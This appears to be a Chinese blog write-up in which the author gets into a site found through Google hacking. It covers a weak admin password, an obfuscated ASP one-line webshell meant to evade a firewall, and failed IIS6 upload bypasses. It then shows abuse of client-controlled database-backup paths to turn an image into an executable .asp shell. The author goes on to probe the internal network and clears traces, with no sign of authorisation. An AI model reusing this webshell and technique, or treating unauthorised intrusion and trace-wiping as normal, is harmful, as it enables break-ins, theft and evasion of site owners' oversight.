0x00 前言

很久之前通过数据库备份拿到的一个webshell，本来准备等他们修复了之后再写的，但是提交了漏洞和修复方案他们接收之后很长时间没有修复，忽视了漏洞。所以今天写出来了。

0x01 多次尝试

首先这个站是偶然google hacking时找到的后台弱密码，进入后台之后发现是IIS6.0的服务器：

这个后台可以对前端的文章、新闻等进行修改，发现可以上传图片到文章中，是一个上传点。

先编辑一个一句话木马,存为asp格式

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"4"&")"&")")%> 

直接上传.asp文件，被防火墙阻止。

先上传.jpg文件，然后通过burpsuite更改后缀为.asp，然后上传，发现仍然被拦截，看来是后端拦截。

尝试使用IIS6.0的解析漏洞，将.asp;.jpg文件解析成.asp文件，但是更改了一个1.asp;.jpg后缀的文件上传之后，文件名整体被改成一个日期的+随机数+.jpg的文件名。

尝试用burpsuite改数据，0x00截断方式、超长文件名仍然不可行。

0x02 改变思路

本来测试到这里我已经放弃通过上传点来getshell，但是不甘心就去问了下朋友，朋友说他正好在复现这个kindeditor编辑器的漏洞，为我提供了其他思路，我去网上找了一会kindeditor编辑器漏洞版本，尝试了一会，发现目前这个版本是4.1.10不存在之前那些典型的漏洞。

然后这个时候朋友告诉我有数据库备份，可以通过数据库备份功能来利用解析漏洞。

0x03 开始尝试

先编辑一个过狗asp马，更改为jpg格式上传。

然后在数据库备份界面，发现直接无法更改备份的源路径和目的路径

但是这两个路径是前端可控的，那就很容易了，直接f12更改页面中对应的原路径为自己上传的图片马，目的路径为123.asp即可。

然后备份数据库，在upload路径找到自己的马，直接用菜刀连接，成功getshell。

后来传大马稍微对内网测试了一下，然后完成之后清理痕迹。

0x04 总结

虽然是很老的一个漏洞了，没有太多亮点，但是体现了渗透测试过程中要力求多样性，了解的方式和技巧越多，就距离成功越接近。